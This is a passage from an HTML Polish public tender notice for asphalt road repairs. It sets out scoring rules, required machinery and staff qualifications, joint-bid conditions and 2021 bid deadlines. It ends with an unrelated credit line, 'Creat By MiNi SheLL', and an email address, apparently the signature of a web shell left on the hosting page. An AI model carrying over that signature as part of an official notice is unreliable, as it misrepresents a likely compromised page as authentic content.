większej niż 50% wartości zamówienia podstawowego dla każdej części zamówienia, w<br/>przypadku wcześniejszego wyczerpania kwoty umownego wynagrodzenia Wykonawcy lub w<br/>przypadku, gdy pozostała do wykorzystania kwota wynagrodzenia będzie niewystarczająca do zlecenia<br/>robót budowlanych objętych przedmiotem umowy.<br/>Udzielenie zamówień, o których mowa w art. 214 ust. 1 pkt 7 ustawy Pzp, będzie polegać na<br/>powtórzeniu tego samego zakresu zamówienia, przy użyciu takiej samej ilości sprzętu co w zadaniu,<br/>którego dotyczy umowa podstawowa. Przy udzielaniu tych zamówień, wszystkie wymagania zawarte w<br/>SWZ wraz załącznikami dotyczyć będą także realizacji zamówienia w ramach art. 214 ust. 1 pkt 7<br/>ustawy Pzp.<br/>Warunkiem udzielenia zamówień, o których mowa w zdaniu pierwszym jest posiadanie środków<br/>finansowych na ich wykonanie. Na okoliczność ich wystąpienia, zostanie zawarta umowa w trybie<br/>zamówienia z wolnej ręki.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryteria i zasady oceny ofert<br/>1. Zamawiający będzie oceniał oferty nieodrzucone według następujących kryteriów:<br/>Nr: Nazwa kryterium: Waga:<br/>1 Cena (Pc) 60%<br/>2 Czas wykonania robót (Pt) 40%<br/>2. Zasady oceny ofert w poszczególnych kryteriach:<br/>Nr kryterium Wzór:<br/>1 CENA<br/>Pc = (Oferta z najniższą ceną/Oferta oceniana) x 60 pkt<br/>Kryterium „Cena” będzie rozpatrywane na podstawie ceny brutto za wykonanie przedmiotu<br/>zamówienia, podanej przez Wykonawcę w Formularzu oferty. Zamawiający ofercie o najniższej cenie<br/>przyzna 60 punktów, a każdej następnej zostanie przyporządkowana liczba punktów proporcjonalnie<br/>mniejsza obliczona wg wzoru powyżej.<br/>2 CZAS WYKONANIA ROBÓT<br/>Pt = max. 40 pkt<br/>Kryterium „Czas wykonania robót” będzie rozpatrywane na podstawie zadeklarowanego w formularzu<br/>oferty czasu wykonania robót budowlanych. Przez czas wykonania robót rozumie się liczbę dni kalendarzowych jaka upłynie od dnia zawarcia<br/>umowy do dnia zgłoszenia Zamawiającemu zakończenia wykonywania przedmiotu zamówienia.<br/>Maksymalny czas wykonania robót wymagany przez Zamawiającego nie może być dłuższy niż 18 dni.<br/>Punkty w tym kryterium zostaną przydzielone w następujący sposób:<br/>1) zaoferowanie 18 dni czasu wykonywania robót – 0 pkt;<br/>2) zaoferowanie 16 dni czasu wykonywania robót – 15 pkt;<br/>3) zaoferowanie 14 dni czasu wykonywania robót – 40 pkt;<br/>Wykonawca, który zaoferuje czas wykonania robót krótszy niż 14 dni – otrzyma 40 pkt, a do umowy<br/>zostanie przyjęty czas wykonania robót wynoszący 14 dni.<br/>Wykonawca, który zaoferuje czas wykonania robót pomiędzy okresami wskazanymi powyżej tj.<br/>pomiędzy 14 a 16 lub 16 a 18 dni - do umowy zostanie przyjęty czas wykonania robót dłuższy<br/>wynoszący odpowiednio 16 lub 18 dni i zostanie przyznana odpowiednia ilość punktów w zależności od<br/>przyjętej ilości dni.<br/>Jeśli Wykonawca w formularzu oferty wykaże okres dłuższy niż 18 dni lub nie wykaże żadnego okresu,<br/>a z innych dokumentów nie będzie wynikało, że nastąpiła omyłka, oferta zostanie odrzucona, zgodnie z<br/>art. 226 ust. 1 pkt 5) ustawy Pzp.<br/>3. Za najkorzystniejszą zostanie wybrana oferta, która zgodnie z powyższymi kryteriami oceny ofert<br/>uzyska najwyższą sumę punktów Pc + Pt spośród ofert nie podlegających odrzuceniu.<br/>4. Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia<br/>taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający wybiera spośród tych ofert ofertę,<br/>która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas wykonania robót</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie precyzuje w tym zakresie szczególnych wymagań.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej,<br/>o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie precyzuje w tym zakresie szczególnych wymagań.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie precyzuje w tym zakresie szczególnych wymagań.<br/>4) zdolności technicznej lub zawodowej:<br/>4.1) warunki dotyczące zdolności technicznej:<br/>O zamówienie mogą ubiegać się Wykonawcy dysponujący odpowiednim potencjałem<br/>technicznym. Wykonawca w celu zweryfikowania przez Zamawiającego jego zdolności do<br/>należytego wykonania udzielanego zamówienia oraz oceny spełnienia warunku musi wykazać,<br/>iż dysponuje lub będzie dysponował w czasie wykonania umowy (wraz z informacją o podstawie<br/>dysponowania) następującym potencjałem technicznym:<br/>Część zamówienia nr 1<br/>a) wytwórnią mieszanek mineralno – asfaltowych wyposażona w otaczarkę o mieszaniu<br/>cyklicznym lub ciągłym z możliwością podgrzewania kruszywa, wyposażoną w automatyczny<br/>dozownik stabilizatora. Wydajność otaczarki nie mniejsza niż 120 Mg/h lub sprzęt równoważny -<br/>1 szt.,<br/>b) układarką mas bitumicznych wyposażona w sterownik elektroniczny oraz deskę wibracyjną<br/>lub sprzętem równoważnym – 1 szt.,<br/>c) zagęszczarką płytową lub sprzętem równoważnym – 1 szt.,<br/>d) szczotką mechaniczną lub sprzętem równoważnym – 1 szt.,<br/>e) samojezdną skrapiarką lepiszcza wyposażoną w urządzenie pomiarowe oraz mechanizmy<br/>regulacyjne, które zapewniają równomierne rozłożenie lepiszcza w kierunku podłużnym i<br/>poprzecznym lub sprzętem równoważnym – 1 szt.,<br/>f) frezarką do nawierzchni bitumicznych lub sprzętem równoważnym – 1 szt.,<br/>g) samochodem ciężarowym samowyładowczym o ładowności powyżej 10 T wyposażonym w<br/>przykrycie z plandeki lub termos do przewożenia mieszanki mineralno-asfaltowej na gorąco lub<br/>sprzętem równoważnym – 1 szt.,<br/>h) walcem statycznym lub sprzętem równoważnym – 1 szt.,<br/>i) malowarką drogową lub sprzętem równoważnym – 1 szt.<br/>Część zamówienia nr 2<br/>a) wytwórnią mieszanek mineralno – asfaltowych wyposażona w otaczarkę o mieszaniu<br/>cyklicznym lub ciągłym z możliwością podgrzewania kruszywa, wyposażoną w automatyczny<br/>dozownik stabilizatora. Wydajność otaczarki nie mniejsza niż 120 Mg/h lub sprzęt równoważny -<br/>1 szt.,<br/>b) układarką mas bitumicznych wyposażona w sterownik elektroniczny oraz deskę wibracyjną<br/>lub sprzętem równoważnym – 1 szt.,<br/>c) zagęszczarką płytową lub sprzętem równoważnym – 1 szt.,<br/>d) szczotką mechaniczną lub sprzętem równoważnym – 1 szt.,<br/>e) samojezdną skrapiarką lepiszcza wyposażoną w urządzenie pomiarowe oraz mechanizmy<br/>regulacyjne, które zapewniają równomierne rozłożenie lepiszcza w kierunku podłużnym i<br/>poprzecznym lub sprzętem równoważnym – 1 szt.,<br/>f) frezarką do nawierzchni bitumicznych lub sprzętem równoważnym – 1 szt.,<br/>g) samochodem ciężarowym samowyładowczym o ładowności powyżej 10 T wyposażonym w<br/>przykrycie z plandeki lub termos do przewożenia mieszanki mineralno-asfaltowej na gorąco lub<br/>sprzętem równoważnym – 1 szt.,<br/>h) walcem statycznym lub sprzętem równoważnym – 1 szt.,<br/>W przypadku złożenia oferty na dwie części zamówienia należy spełnić powyższy warunek w<br/>zakresie dysponowania potencjałem technicznym dla każdej części oddzielnie za wyjątkiem<br/>dysponowania wytwórnią mieszanek mineralno - asfaltowych.<br/>4.2) warunki dotyczące zdolności zawodowej:<br/>a) Doświadczenie zawodowe: Wykonanie należycie w okresie ostatnich 5 lat przed upływem<br/>terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie,<br/>zgodnie z zasadami sztuki budowlanej i prawidłowe ukończenie przynajmniej jednego lub kilku<br/>zamówień na wykonanie remontów cząstkowych nawierzchni bitumicznych masą mineralno –<br/>asfaltową na gorąco lub emulsją asfaltową i grysami lub na wykonanie nawierzchni z mieszanki<br/>mineralno – bitumicznej o łącznej wartości wykazanych zamówień nie mniejszej niż 450 000 zł<br/>brutto z podaniem rodzaju, wartości, daty, miejsca wykonywania i podmiotów na rzecz których<br/>roboty budowlane zostały wykonane.<br/>b) Kwalifikacje zawodowe osób skierowanych przez Wykonawcę do realizacji zamówienia:<br/>Część zamówienia nr 1<br/>a) Kierownik Budowy – co najmniej 1 osoba posiadająca uprawnienia budowlane do kierowania<br/>robotami budowlanymi w specjalności drogowej lub inne uprawnienia umożliwiające<br/>wykonywanie tych samych czynności, do wykonywania których w aktualnym stanie prawnym<br/>uprawniają uprawnienia budowlane w tej specjalności,<br/>b) Operator maszyny do rozkładania mieszanek mineralno - asfaltowych – 1 osoba posiadająca<br/>uprawnienia operatora wydane zgodnie z Rozporządzeniem Ministra Gospodarki z dnia 20<br/>września 2001r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i<br/>innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (t.j. Dz.U z 2018 r.,<br/>poz. 583 z późn. zm.) i posiadająca wpis do książki operatora lub uprawnienia równoważne,<br/>c) Operator samojezdnej frezarki do nawierzchni dróg – 1 osoba posiadająca uprawnienia<br/>operatora wydane zgodnie z Rozporządzeniem Ministra Gospodarki z dnia 20 września 2001r. w<br/>sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń<br/>technicznych do robót ziemnych, budowlanych i drogowych (t.j. Dz.U z 2018 r., poz.583 z późn.<br/>zm.) i posiadająca wpis do książki operatora lub uprawnienia równoważne,<br/>d) Kierowca – 1 osoba posiadająca przewidziane przepisami prawa uprawnienia do prowadzenia<br/>pojazdu ciężarowego powyżej 3,5 T lub uprawnienia równoważne,<br/>e) Operator walca drogowego – 1 osoba posiadająca uprawnienia operatora wydane zgodnie z<br/>Rozporządzeniem Ministra Gospodarki z dnia 20 września 2001r. w sprawie bezpieczeństwa i<br/>higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych,<br/>budowlanych i drogowych (t.j. Dz. U z 2018 r., poz. 583 z późn. zm.) i posiadająca wpis do<br/>książki operatora lub uprawnienia równoważne,<br/>f) Operator malowarki samojezdnej – 1 osoba nie posiadająca szczegółowych uprawnień<br/>przewidzianych przepisami praw, g) 2 osoby posiadające uprawnienia do zatrzymywania i kierowania ruchem wydane przez<br/>Wojewódzki Ośrodek Ruchu Drogowego na podstawie Rozporządzenia Ministra Spraw<br/>Wewnętrznych i Administracji z dnia 6 lipca 2010 r. w sprawie kierowania ruchem drogowym (t.j.<br/>Dz. U. z 2016 r., poz. 143 z późn. zm.) lub uprawnienia równoważne,<br/>h) 2 pracowników fizycznych – 2 osoby nie posiadające szczegółowych uprawnień<br/>przewidzianych przepisami prawa.<br/>Część zamówienia nr 2<br/>a) Kierownik Budowy – co najmniej 1 osoba posiadająca uprawnienia budowlane do kierowania<br/>robotami budowlanymi w specjalności drogowej lub inne uprawnienia umożliwiające<br/>wykonywanie tych samych czynności, do wykonywania których w aktualnym stanie prawnym uprawniają uprawnienia budowlane w tej specjalności,<br/>b) Operator maszyny do rozkładania mieszanek mineralno - asfaltowych – 1 osoba posiadająca<br/>uprawnienia operatora wydane zgodnie z Rozporządzeniem Ministra Gospodarki z dnia 20<br/>września 2001r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i<br/>innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (t.j. Dz.U z 2018 r.,<br/>poz.583 z późn. zm.) i posiadająca wpis do książki operatora lub uprawnienia równoważne,<br/>c) Operator samojezdnej frezarki do nawierzchni dróg – 1 osoba posiadająca uprawnienia<br/>operatora wydane zgodnie z Rozporządzeniem Ministra Gospodarki z dnia 20 września 2001r. w<br/>sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń<br/>technicznych do robót ziemnych, budowlanych i drogowych (t.j. Dz.U z 2018 r., poz.583 z późn.<br/>zm.) i posiadająca wpis do książki operatora lub uprawnienia równoważne,<br/>d) Kierowca – 1 osoba posiadająca przewidziane przepisami prawa uprawnienia do prowadzenia<br/>pojazdu ciężarowego powyżej 3,5 T lub uprawnienia równoważne,<br/>e) Operator walca drogowego – 1 osoba posiadająca uprawnienia operatora wydane zgodnie z<br/>Rozporządzeniem Ministra Gospodarki z dnia 20 września 2001r. w sprawie bezpieczeństwa i<br/>higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych,<br/>budowlanych i drogowych (t.j. Dz.U z 2018 r., poz. 583 z późn. zm.) i posiadająca wpis do<br/>książki operatora lub uprawnienia równoważne,<br/>f) 2 osoby posiadające uprawnienia do zatrzymywania i kierowania ruchem wydane przez<br/>Wojewódzki Ośrodek Ruchu Drogowego na podstawie Rozporządzenia Ministra Spraw<br/>Wewnętrznych i Administracji z dnia 6 lipca 2010 r. w sprawie kierowania ruchem drogowym (t.j.<br/>Dz. U. 2016 z 2016 r., poz. 143 z późn. zm.) lub uprawnienia równoważne,<br/>g) 2 pracowników fizycznych – 2 osoby nie posiadające szczegółowych uprawnień<br/>przewidzianych przepisami prawa.<br/>W przypadku złożenia oferty na dwie części zamówienia należy spełnić powyższy warunek w<br/>zakresie kwalifikacji zawodowych dla każdej części oddzielnie.<br/>W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie<br/>zamówienia (konsorcjum) warunki z pkt 4 mogą być spełnione łącznie przez składających<br/>wspólną ofertę.<br/>W przypadku zdobytego doświadczenia zawodowego w ramach konsorcjum, Wykonawca<br/>będzie zobowiązany wskazać zakres i wartość jego realnego wkładu w realizację zadania.<br/>2. Oceniając zdolność techniczną lub zawodową, Zamawiający może na każdym etapie<br/>postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie<br/>przez Wykonawcę sprzecznych interesów, w szczególności zaangażowane zasobów<br/>technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy<br/>może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) W celu potwierdzenia spełnienia przez Wykonawcę warunków udziału w<br/>postępowaniu, Zamawiający żąda przedłożenia:<br/>a) wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem<br/>dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o<br/>których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego<br/>roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w<br/>stanie uzyskać tych dokumentów – inne odpowiednie dokumenty;<br/>b) wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w<br/>szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami<br/>budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i<br/>wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych<br/>przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami;<br/>c) wykazu narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w celu<br/>wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">2) W celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu,<br/>Zamawiający zamiast podmiotowych środków dowodowych, żąda:<br/>a) oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu,<br/>o którym mowa w art. 125 ust. 1 ustawy Pzp – oświadczenie o którym mowa w § 3 Rozporządzenia<br/>Ministra Rozwoju Pracy i Technologii z dnia 23 grudnia 2020 r.<br/>w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może<br/>żądać zamawiający od wykonawcy (Dz. U. 2020 r. poz. 2415).</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Oferta składana w postępowaniu zawiera:<br/>1) Oświadczenie, o którym mowa w Rozdziale VIII cz. I pkt 1;<br/>2) Formularz oferty – Załącznik nr 1 do SWZ;<br/>3) Kosztorys ofertowy – Załącznik nr 2a – 2b do SWZ (stosownie do części zamówienia na którą<br/>wykonawca składa ofertę);<br/>4) Pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia, ewentualnie umowa o współdziałaniu, z której będzie wynikać<br/>przedmiotowe pełnomocnictwo. Pełnomocnik może być ustanowiony<br/>do reprezentowania Wykonawców w postępowaniu albo do reprezentowania<br/>w postępowaniu i zawarcia umowy;<br/>5) Dokumenty z których wynika prawo do podpisania oferty, odpowiednie pełnomocnictwa;<br/>6) Zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych<br/>zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy<br/>potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi<br/>zasobami tych podmiotów – jeśli dotyczy;<br/>7) Oświadczenie, o którym mowa w Rozdziale VIII cz. I pkt 5 dotyczące robót/usług/dostaw,<br/>które wykonają poszczególni Wykonawcy (załącznik nr 9 do SWZ) – dotyczy Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia tj. konsorcjum/spółki cywilne – jeśli dotyczy; <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2. W przypadku, o którym mowa w ust. 1, Wykonawcy ustanawiają pełnomocnika<br/>do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>3. W odniesieniu do Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>Zamawiający może określić wymagania związane z realizacją zamówienia w inny sposób niż w<br/>odniesieniu do pojedynczych Wykonawców, jeżeli jest to uzasadnione charakterem zamówienia i proporcjonalne do jego przedmiotu.<br/>4. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o<br/>niepodleganiu wykluczeniu, spełnianiu warunków udziału w postępowaniu lub kryteriów selekcji,<br/>w zakresie wskazanym przez Zamawiającego, składa każdy z Wykonawców. Oświadczenia te<br/>potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu lub<br/>kryteriów selekcji w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków<br/>udziału w postępowaniu lub kryteriów selekcji.<br/>5. W odniesieniu do warunków dot. wykształcenia, kwalifikacji zawodowych lub doświadczenia,<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach<br/>tych Wykonawców, którzy wykonają roboty budowlane lub usługi do realizacji których te<br/>zdolności są wymagane. W przypadku, o którym mowa powyżej Wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika,<br/>które roboty budowlane/dostawy/usługi wykonają poszczególni Wykonawcy - wzór oświadczenia<br/>stanowi załącznik nr 6 do SWZ.<br/>6. W przypadku wspólnego ubiegania się o zamówienie Wykonawcy ustanawiają pełnomocnika<br/>do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wybrany Wykonawca jest zobowiązany do zawarcia umowy w sprawie zamówienia<br/>publicznego na warunkach określonych we Wzorze Umowy, stanowiącym Załącznik nr 4<br/>do SWZ.<br/>2. Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej<br/>oferty w zakresie uregulowanym w art. 454-455 ustawy Pzp oraz wskazanym we Wzorze<br/>Umowy, stanowiącym Załącznik nr 4 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-12 08:45</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/transakcja/527190</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-12 09:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-11</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">3</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> Kryterium &#34;cena&#34; oraz kryterium &#34;czas wykonania robót&#34; - określone w SWZ, rozdział XI. <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Termin realizacji: od dnia zawarcia umowy do terminu wynikającego z przyjętego przez wykonawcę „czasu wykonania robót” w formularzu oferty (więcej informacji można znaleźć w rozdziale XI SWZ) z zastrzeżeniem, że realizacja zamówienia musi się zakończyć nie później niż do 15 grudnia 2021 r. w przypadku gdy wyznaczony termin „czasu wykonania robót” przekroczyłby dzień 15 grudnia 2021 r.

Creat By MiNi SheLL
Email: jattceo@gmail.com